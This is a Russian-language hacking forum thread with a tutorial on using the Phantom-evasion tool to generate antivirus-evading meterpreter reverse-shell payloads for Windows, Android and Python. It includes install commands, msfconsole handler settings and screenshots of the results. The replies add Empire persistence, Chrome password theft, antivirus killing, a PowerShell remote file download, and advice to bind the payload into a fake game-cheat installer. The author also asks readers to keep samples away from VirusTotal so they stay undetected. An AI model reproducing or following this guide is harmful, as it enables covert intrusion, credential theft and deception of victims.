• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Статья Phantom-evasion FUD payloads

OneDollar

OneDollar

Well-known member
07.09.2017
283
344
И снова Hello! Сегодня я хочу представить Вам удобный инструмент под названием Phantom-evasion.
Что он из себя представляет ?
Phantom-evasion - это удобный и простой в использовании инструмент для генерации полезной нагрузки, написан на Python, совместим с версиями python 2.7 and 3.4 и выше.

(Для генерации pyinstaller требуется python 2.7). Основной задачей данного инструмента является генерирование полезной нагрузки с обходом почти АВ почти 100% FUD на сегодняшний день.
Форматы выпуска payloads: exe/elf/apk/dmg
Платформы:
Windows,Linux,Android,Osx,Universal (Platform-Target)
Виды payloads:
  • windows/meterpreter/reverse_tcp for exe
  • linux/x86/meterpreter/reverse_tcp for elf
  • android/meterpreter/reverse_tcp for apk
  • osx/x64/meterpreter/reverse_tcp for dmg
  • python/meterpreter/reverse_tcp in Universal modules
Формат модулей рассмотрим далее. Перейдем к установке. Я буду использовать Kali Linux 2017.3 в виде атакующей машины, Windows Server 2012 R3 и Windows 10 (Build 16299) в виде атакуемой машины.

Вся информация предоставляется в ознакомительных целях. Данная статья описывает последовательность действий и инструменты, с помощью которых злоумышленник может проникнуть в Вашу систему и похитить ваши данные.

Установка :
Код:
git clone https://github.com/oddcod3/Phantom-Evasion.git
cd Phantom-Evasion
chmod +x phantom-evasion.py

Запуск:
Код:
./phantom-evasion.py

Проверка зависимостей
Phantom-evasion FUD payloads


Если все окей, то видим следующую картину:

Phantom-evasion FUD payloads


Посмотреть список всех модулей:

Код:
1 enter

Phantom-evasion FUD payloads


Сегодня я продемонстрирую генерацию полезной нагрузки для Windows, Android. Вернемся в главное меню (0). Выберем список модулей Windows (2)

Phantom-evasion FUD payloads


Пробуем вариант под номер 1

Phantom-evasion FUD payloads


Выберем способ генерации шелкода. Я выбираю с помощью всеми известного msfvenom.

Код:
1 enter
Далее нас просят выбрать тип payload. Я выберу следующий:
Код:
windows/meterpreter/reverse_https
Далее нужно прописать LHOST ( на какой айпишник стучаться)
Код:
ip
Далее нужно прописать LPORT(на какой порт стучаться)
Код:
2222
После выбрать имя файла
ForCodeby
После чего пойдет генерации и компиляция нашего payload. Если все успешно, то в нашей папке будет хранится файл ForCodeby.exe


Phantom-evasion FUD payloads


Проверим работоспособность нашего payload, так же посмотрим результаты на nodistribute.com
Запустим хандлер и будет слушать Ip и порт, который мы указали при генерации payload:

Код:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.0.102
set LPORT 2222
exploit -j
После запуска на целевом компьютере в процессах появится процесс : ForCodeby.exe

Phantom-evasion FUD payloads


Проверим файл на nodistribute.com



И видим полный FUD!!

Phantom-evasion FUD payloads


Уважительная просьба не лить на VIRUS TOTAL. Дайте полезной нагрузке подышать свежим воздухом< ВЗДОХНУТЬ ГЛОТОК СВОБОДЫ!) Проверяйте хотя бы на сайте, на котором проверил я. От этого будет лучше всем, кроме АВ компаний. Спасибо!

Что ж, хороший старт, давайте создадим еще один с помощью другого способа, тоже для Windows. С использованием абсолютно тех же параметров, которые я указал выше. Я не буду скринить процесс, он ничем не будет отличаться от выше стоящего, за исключением выбора модуля.

Я выбираю:

Код:
[2] Windows MultipathHeapAlloc  (C)
Phantom-evasion FUD payloads


Все, файл создан. Проверим работоспособность. Отправим на атакуемую машину и запустим.

Phantom-evasion FUD payloads



Как видим снова Prof1t! ^_^
Процесс запущен, сессия прилетела. Доступ к командной строке получен =)


Результаты обнаружения тоже радуют глаз.

Phantom-evasion FUD payloads


Что ж, я думаю с виндовс достаточно двух примеров. Сразу хочу сказать что 3-й способ я тоже пробовал
Какой - то Богом забытый что-то нашел, но это не страшно)

Результат :

Также, по просьбе ghostphisher в теме https://codeby.net/threads/uvazhaemye-avtory-tem.61280/ я проверю работоспособность PAYLOAD на Windows 10



Как видим, профит!

Теперь попробуй сгенерить файлик для анроид. Самому интересно че и как будет :)

В главном меню выберем:
Код:
[5]  List Android modules
Далее выбор не большой)
Код:
[1] Android Droidmare msfvenom-rebuilder (Smali)[/B][/B][/B][/B][/B]
[B][B][B][B][B][1] Obfuscate msf payload
После чего формальности заполнения LHOST and LPORT и выбор payload
Код:
android/meterpreter/reverse_https


Собственно видим успешную генерацию PAYLOAD!) Но рано радоваться, надо проверить его работу и обнаружение! Убедительная просьба для тех, у кого есть анроид, проверить АВАСПОМ и dr Web. Почему сам не могу? У меня кирпич под названием "недостаточно памяти" galaxy ace S5830 который вздрагивает каждый раз, когда я беру его в руки. Поэтому я покажу результат обнаружения на нодистр, а внутренним антивирусом телефона не буду прогонять. Так же сейчас нахожусь не дома, поэтому нет виртуального ведроида) Просто запущу пайлоад, чтобы проверить его работу!

Сессия у меня не прилетает, не знаю с чем это связано. Может ведроид мой совсем плох, с помощью Evil-Droid сгенерированный файл отлично отрабатывает. Здесь процесс появился, но никто на порт не стучится. Если кто будет пробовать, отпишитесь о результатах у себя.


Обнаружение:

Phantom-evasion FUD payloads



Теперь попробуем сгенерировать питоновский файл to exe)
Для этого в главном меню выберем 6


Phantom-evasion FUD payloads




Phantom-evasion FUD payloads


Код:
[2] Universal Polymorphic Pyhterpreter (Python)[/COLOR][/B][/COLOR][/B][/COLOR][/B][/COLOR][/B]
[B][COLOR=#ff8000][B][COLOR=#ff8000][B][COLOR=#ff8000][B][COLOR=#ff8000]python/meterpreter/reverse_https
Далее LHOST and LPORT и после предложить сгенерить .ехе, жмем y. Все на выходе появился наш файл.


Проверим его работу на вин 10 с питоном 2.7

Phantom-evasion FUD payloads


После запуска на стороне вин 10 пришла сессия.
Результат скана :

Phantom-evasion FUD payloads



Если подвести итоги, то в целом я получил хорошие впечатления) Вышел он недавно, надеюсь поживет еще. Хотя в версии 0.2 они обещали все обновить еще раз! Надеюсь статья получилось годной, спасибо за внимание, всем Prof1t! =)
 

Вложения

Последнее редактирование:
al04e

al04e

Cyberpunk
Премиум
24.05.2017
293
1 294
Автора прошу изменить цвет текста. В темном стиле не читаемо)
 
  • Нравится
Реакции: OneDollar и SooLFaa
ghost

ghost

YW1uZXNpYQo=
Gold Team
12.05.2016
1 535
3 096
Хорошая статья. Все прекрасно донесено. Только цвет, но это исправимо.
 
SooLFaa

SooLFaa

Администратор
15.07.2016
814
1 318
Кстати да. Не юзайте бл*****й черный цвет.
 
OneDollar

OneDollar

Well-known member
07.09.2017
283
344
Товарищи, какой цвет юзать ?) Второй раз пишу.. Подскажите кому что по душе, я и поставлю. Это не проблема) Я привык просто к такому варианту.
 
SooLFaa

SooLFaa

Администратор
15.07.2016
814
1 318
Читай правила оформления тем.
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
2 990
Отлично бро) Рад видеть что ты стараешься именно на нашем форуме) Реально видно что человек постарался - и видно что ему самому это прёт)))
Побольше таких статей! Мне понравилось.
Конкретно понравилось что описан инструмент не просто с вики страницы репозитория а личный опыт тестирования как настоящего тестировщика,свои скрины, свои выводы и т.д.
 
kot-gor

kot-gor

Gold Team
07.09.2016
523
682
Изложено более чем подробно.мне нравится.продолжай в том же духе.
 
  • Нравится
Реакции: RandellFox и remez
D

Dmitry88

Здорово. Все описано, скрины и личные тесты! Респект.
 
V

Valkiria

У меня возникло желание оставить отзыв о статье ещё вчера, но повинуясь поговорке "утро вечера мудренее" решила отложить это удовольствие )
А утром, оказывается, и без меня автор получил огромную порцию похвал ))
Все лестные отзывы, оставленные выше - объективны, мне остаётся лишь присоединиться к предыдущим комментаторам.
В дополнение хочется отметить следующий положительный (наверное, субъективный) оттенок статьи:
  • статья "живая", то есть носит не теоретический характер,
  • статья провоцирует читателя на рождение собственных мыслей - это очень важно, ИМХО )
  • статья носит обучающий и познавательный характер.
 
B

Bidjo111

Red Team
14.11.2017
198
73
Автор, спасибо за труды!

Можно пояснение?
Я правильно понимаю, что если вредонос доставлен в систему и АВ никак на это не отреагировал, то это еще не значит, что при запуске этого самого exe-шника никакие HIDS/HIPS/АВ не среагируют и не предпримут контрмеры?
 
OneDollar

OneDollar

Well-known member
07.09.2017
283
344
Автор, спасибо за труды!

Можно пояснение?
Я правильно понимаю, что если вредонос доставлен в систему и АВ никак на это не отреагировал, то это еще не значит, что при запуске этого самого exe-шника никакие HIDS/HIPS/АВ не среагируют и не предпримут контрмеры?
Смотри какая ситуация. Сегодня я получил метерпретер сессию, атакованная машина была вин10 с авастом активированным. В общем права системы, все дела. Решил мигрировать в explorer и тут аваст заблочил сессию и выдал сообщение о найденной угрозе. Чуть позже доберусь до компа, покажу.Я более не вникал как это обойти. Возможно сделать подключение по ssh. Нужно пробовать, если что получится, я обязательно отпишусь.Вообще сейчас рою в сторону убийства процессов АВ, у нас на форуме была хорошая статья, надо найти.На этой же машине использовал бэкдор для метерпретера через повершел, и мигрировать успешно удается. Зацепки есть.

Скрин:

Phantom-evasion FUD payloads
 
Последнее редактирование:
B

Bidjo111

Red Team
14.11.2017
198
73
Смотри какая ситуация. Сегодня я получил метерпретер сессию,
А пост модуль метерпретера killav пробовали?

Да и опять же... Получить сессию можно как через dllinject, а можно через всякие файлы, запускаемые непосредственно с ЖД... У вас какой вариант?
 
OneDollar

OneDollar

Well-known member
07.09.2017
283
344
А пост модуль метерпретера killav пробовали?

Да и опять же... Получить сессию можно как через dllinject, а можно через всякие файлы, запускаемые непосредственно с ЖД... У вас какой вариант?
Не пробовал, буду пробовать. Я сессию получаю на Empire Framework, от туда через командную строку получаю метерпретер. Дальше по ситуации. Собственно ищу способы успешной эксплуатации метерпретера по нескольким причинам :
Во первых: работа с паролями. В Empire можно взять пароли того же хром при соблюдении нескольких условий:
1. Права. Права должны быть обязательно юзера. Не системы. Иначе ничего не выйдет
2. Браузер должен быть обязательно закрыт.
Метер в этом варианте куда лучше.
Во вторых: проблема со скринами. После закрепления в системе, при перезагрузке ПК и подключении агента мы получаем сессию в империи с правами системы. Мигрировать не получается, запускаешь скрин и получаешь .omman ERRORRR.
В третьих: ограничение по передаче и закачке данных. В империи большой косяк в том плане, что нельзя передавать и принимать файлы с размером более 1Мб
[doublepost=1511784529,1511784399][/doublepost]
Прекрасная статья! Самый лучший спопоб научиться - это учить других! =)



Псс, поправь тут на "LPORT"
Хорошо что заметил) исправил!
 
B

Bidjo111

Red Team
14.11.2017
198
73
Не пробовал, буду пробовать. Я сессию получаю на Empire Framework
Т.е. вместо windows/meterpreter/... вы выбираете launcher, сделанный в Empire? Если так, то как вы его выбираете в фантоме? У меня по абсолютному пути питон ругается сильно...

После закрепления в системе
Каким способом закреплялись?

P.S. NOD32 с включенным HIPS на вредонос не отреагировал. Есть правда трудности с постэксплуатацией, но это уже отдельная история... Хороший, удобный инструмент.
 
OneDollar

OneDollar

Well-known member
07.09.2017
283
344
Т.е. вместо windows/meterpreter/... вы выбираете launcher, сделанный в Empire? Если так, то как вы его выбираете в фантоме? У меня по абсолютному пути питон ругается сильно...



Каким способом закреплялись?

P.S. NOD32 с включенным HIPS на вредонос не отреагировал. Есть правда трудности с постэксплуатацией, но это уже отдельная история... Хороший, удобный инструмент.
Создаю с помощью usestaget для Empire. Прочти https://codeby.net/threads/znakomstvo-s-powershell-empire-framework.58469/
Для метера создаю как указано в статье.
Закрепление в системе делаю через империю:

Phantom-evasion FUD payloads


После перезагрузки ПК видим след картину :

Phantom-evasion FUD payloads


P.s. на это закрепление никто не ругается :)
 
H

Hackaton192

Не пробовал, буду пробовать. Я сессию получаю на Empire Framework, от туда через командную строку получаю метерпретер. Дальше по ситуации. Собственно ищу способы успешной эксплуатации метерпретера по нескольким причинам :
Во первых: работа с паролями. В Empire можно взять пароли того же хром при соблюдении нескольких условий:
1. Права. Права должны быть обязательно юзера. Не системы. Иначе ничего не выйдет
2. Браузер должен быть обязательно закрыт.
Метер в этом варианте куда лучше.
Во вторых: проблема со скринами. После закрепления в системе, при перезагрузке ПК и подключении агента мы получаем сессию в империи с правами системы. Мигрировать не получается, запускаешь скрин и получаешь .omman ERRORRR.
В третьих: ограничение по передаче и закачке данных. В империи большой косяк в том плане, что нельзя передавать и принимать файлы с размером более 1Мб
[doublepost=1511784529,1511784399][/doublepost]
Хорошо что заметил) исправил!
Бро империя дает тебе POWERSHELL и это спасает в очень многих случаях
Твой третий пункт решается модулем management/invoke_script
Далее set ScriptCmd (New-Object Net.WebClient).DownloadFile(" ","C:\\Path"),
где ip-server - это либо твой сервак,либо хранилище
С:\\Path - место куда заливаешь
И хоть закачайся
 
Последнее редактирование модератором:
  • Нравится
Реакции: Vertigo, remez и OneDollar
OneDollar

OneDollar

Well-known member
07.09.2017
283
344
?

А дальше получившуюся строку в фантом?
Посмотреть вложение 13290
Зачем? Нет, просто создай к примеру бат. Потом переведи в ЕХЕ, с помощью Smart Install Maker склей с каким-либо установщиком. Включи СИ, к примеру читы для WOT. Смотря что хочешь сделать.

Phantom-evasion FUD payloads
 
  • Нравится
Реакции: Diplomat
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб